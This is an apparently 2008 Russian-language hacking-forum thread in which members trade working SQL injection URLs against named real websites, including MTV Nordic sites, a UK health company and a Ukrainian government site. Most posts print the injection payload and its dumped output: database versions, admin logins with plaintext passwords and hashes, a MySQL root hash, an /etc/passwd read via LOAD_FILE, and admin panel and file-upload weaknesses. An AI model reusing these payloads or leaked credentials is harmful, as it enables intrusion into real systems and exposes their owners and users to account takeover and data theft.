ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5821  
Старый 28.06.2008, 15:53
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database())/*
user()=companyh@localhost:
version()=4.1.20
 
Ответить с цитированием

  #5822  
Старый 28.06.2008, 17:15
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
Сообщение от Rubaka  
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database())/*
user()=companyh@localhost:
version()=4.1.20
Цитата:
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat_ws(0x3a,username,user_ password)+from+phpbb_users/*
administrator:323102a7843e63c39be43e743c20be6a:jup1ter
Цитата:
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,password+from+users/*
Цитата:
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat(user,0x3a,password)+fr om+login/*
admin:health14
 
Ответить с цитированием

  #5823  
Старый 28.06.2008, 19:35
Аватар для SUBJECT617
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

Цитата:
http://www.snseurope.com/snslink/news/generalnews-full.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x20,version(),us er(),database()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20/*
Очень повезло... Версия 4 но имена столбцов и таблиц стандартные =) username password FROM users

Цитата:
http://www.snseurope.com/snslink/news/generalnews-full.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+users/*
 
Ответить с цитированием

  #5824  
Старый 28.06.2008, 23:18
Аватар для Mike 007
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию



Цитата:
http://82.146.59.108/bonapart/plots/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
 
Ответить с цитированием

  #5825  
Старый 29.06.2008, 00:11
Аватар для barracuda
barracuda
Новичок
Регистрация: 21.08.2005
Сообщений: 3
Провел на форуме:
24571

Репутация: 0
По умолчанию

http://www.soyata.com/Shop/ViewItem.cfm?&ID=1112'

hack countinue
 
Ответить с цитированием

  #5826  
Старый 29.06.2008, 00:44
Аватар для lastsmile
lastsmile
Познающий
Регистрация: 22.09.2007
Сообщений: 42
Провел на форуме:
255505

Репутация: 22
По умолчанию

4-я версия, но стоблцы стандартные
http://www.mantoncommunityalliance.org.uk/news/details.php?id=28'+union+select+concat_ws(0x3a,pas sword,email,username)+from+users+limit+0,1/*

ну и как обчно админка тоже стандартная:
http://www.mantoncommunityalliance.org.uk/admin/

есть возможность заливать файлы (ява скрипт отрубаете, и заливаете любые файлы - не только jpg,gif,png) единственное что не нашел-дира куда заливается темповый файл

-----------------------
http://www.community.oleary.pe.ca/news.cfm?id=-1+union+select+1,username,password,4+from+users

login/pass в открытом виде:
bshaw
o859leary

вот и админка:
http://www.community.oleary.pe.ca/admin/
------------------------
http://www.suncal.com/community/?id=1+and+1=2+union+select+1,2,table_name,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19+from+information _schema.tables+limit+58,1/*

5.0.45-community-nt
suncalc_edit@localhost

админка по стандарту, логин и пасс админа смотреть не стал - пошел спать

Последний раз редактировалось lastsmile; 29.06.2008 в 01:53..
 
Ответить с цитированием

  #5827  
Старый 29.06.2008, 01:32
Аватар для nex0
nex0
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963

Репутация: 272
Отправить сообщение для nex0 с помощью ICQ
По умолчанию

mtv.se
Код:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtve.com
Код:
http://www.mtve.com/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.no
Код:
http://www.mtv.no/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.dk
Код:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
musictelevision.fi
Код:
http://www.musictelevision.fi/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
ко всем одно
5.0.37-log:mtvnordicadmin@172.23.59.249:mtvnordic
 
Ответить с цитированием

  #5828  
Старый 29.06.2008, 01:55
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от nex0  
mtv.se
Код:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtve.com
Код:
http://www.mtve.com/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.no
Код:
http://www.mtv.no/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.dk
Код:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
musictelevision.fi
Код:
http://www.musictelevision.fi/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
ко всем одно
5.0.37-log:mtvnordicadmin@172.23.59.249:mtvnordic
Цитата:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=-1+union+select+1,2,concat_ws(0x3a,user,password),4 +from+mysql.user/*
root:0fdf9cda19d19c10

Цитата:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=-1+union+select+1,2,LOAD_FILE(CHAR(47,101,116,99,47 ,112,97,115,115,119,100)),4/*
в исходнике )

Последний раз редактировалось ~!DoK_tOR!~; 29.06.2008 в 01:58..
 
Ответить с цитированием

  #5829  
Старый 29.06.2008, 02:04
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,username,password),3,4+from+baltic_ph pmotion.admin/*
admin:adminpass
Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,user_name,password),3,4+from+baltic_p hpmotion.member_profile/*
Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,username,password),3,4+from+fiat.user s+limit+0,1/*
admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass
Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,login,password),3,4+from+gudrumogidas .gidas_cms_users+limit+0,1
admin:indigovaldas
кароче там очень много всего можно найти .. лень .. основное есть ..
там только 60 табл в которых есть колонка password
 
Ответить с цитированием

  #5830  
Старый 29.06.2008, 02:50
Аватар для swt1
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

http://zito.mvs.gov.ua/?page=3&id=-639+union+select+1,2,3,4,5,6,7/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ